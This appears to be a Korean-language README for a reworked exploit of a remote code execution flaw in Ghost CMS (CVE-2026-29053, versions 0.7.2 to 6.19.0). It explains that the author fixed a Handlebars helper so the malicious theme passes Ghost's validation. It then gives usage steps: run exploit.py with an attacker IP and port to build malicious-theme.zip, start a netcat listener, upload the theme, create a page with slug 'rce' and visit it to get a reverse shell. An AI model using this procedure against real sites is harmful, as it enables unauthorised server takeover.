
Ghost CMS에서 발견된 (RCE) 취약점 (특히 0.7.2부터 6.19.0까지의 버전에 영향)
이것은 동일한 CVE에 대한 rootxran의 Repo를 재작업한 것입니다 - https://github.com/rootxran/CVE-2026-29053
특정 Ghost CMS 환경을 대상으로 테스트하는 동안, 원래 테마 페이로드에서 치명적인 Handlebars 오류(Fatal Handlebars Error)가 발생했습니다. CMS가 악성 테마를 활성화하지 못한 이유는 author.hbs 파일 내에서 더 이상 사용되지 않거나 누락된 헬퍼(social_url)를 참조했기 때문입니다.
저는 Handlebars 템플릿을 기본 제공되는 호환 가능한 헬퍼를 사용하도록 업데이트했습니다. 이를 통해 테마가 Ghost의 내부 검증 검사를 통과하여, 테마 엔진의 안전 파서에 차단되지 않고 익스플로잇이 성공적으로 활성화될 수 있습니다.
사용법: (영상 가이드는 원본 익스플로잇을 참조하세요).
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip
1. nc -lvnp 4444
2. 테마 업로드, slug 'rce'로 페이지 생성
3. /rce/ 방문